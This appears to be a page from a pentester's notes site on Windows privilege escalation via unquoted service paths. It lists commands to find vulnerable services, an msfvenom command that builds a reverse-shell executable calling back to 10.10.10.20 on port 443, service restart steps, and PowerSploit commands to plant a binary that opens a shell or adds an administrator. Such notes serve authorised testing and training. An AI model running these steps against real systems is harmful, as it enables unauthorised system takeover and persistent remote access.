Hack$Notes
Search…
Hack$Notes
Enumeration
Transferring Files
Metasploit Framework
Reverse Shells
Buffer Overflow
Spawning a Shell
Password Attacks
Privilege Escalation
Windows
Kernel Exploits
Stored Credentials
Unquoted Service Path
Always Install Elevated
Weak Permissions
Schedule Tasks
AutoRun Executables
Startup Apps
Passwords
Win PrivEsc Tools
Linux
Port Forwarding
Tools / Techniques
Resources
Powered By GitBook
Unquoted Service Path

Search for Unquoted Path

The following command will search for all the paths except "C:\windows" since a normal user will not have executable permissions on this folder.
## Windows Management Instrumentation Command-Line (WMIC) ##
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
## WMI (Powershell) ##
Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.StartName -eq "LocalSystem" -and $_.PathName -notmatch "`"" -and $_.PathName -notmatch "C:\\Windows"} | Format-List
If a service is found with unquoted path check the permissions of the service with icacls. If we have permissions on any of the folders that leads to the executable then we can escalate our privileges.

Create an executable msfvenom payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.20 LPORT=443 -f exe > /root/same_service_name_as_above.exe

Replace and restart service.

sc stop service_name
sc start service_name

Powersploit

Within powershell run the following.
# Find them
Get-ServiceUnquoted
# Execure a reverse shell or adding new user as administrator.
Write-ServiceBinary -name "Service_Name" -Path "C:\Service_name.exe"
Previous
Stored Credentials
Next
Always Install Elevated
Last modified 1yr ago
Copy link
On this page
Search for Unquoted Path
Create an executable msfvenom payload
Replace and restart service.
Powersploit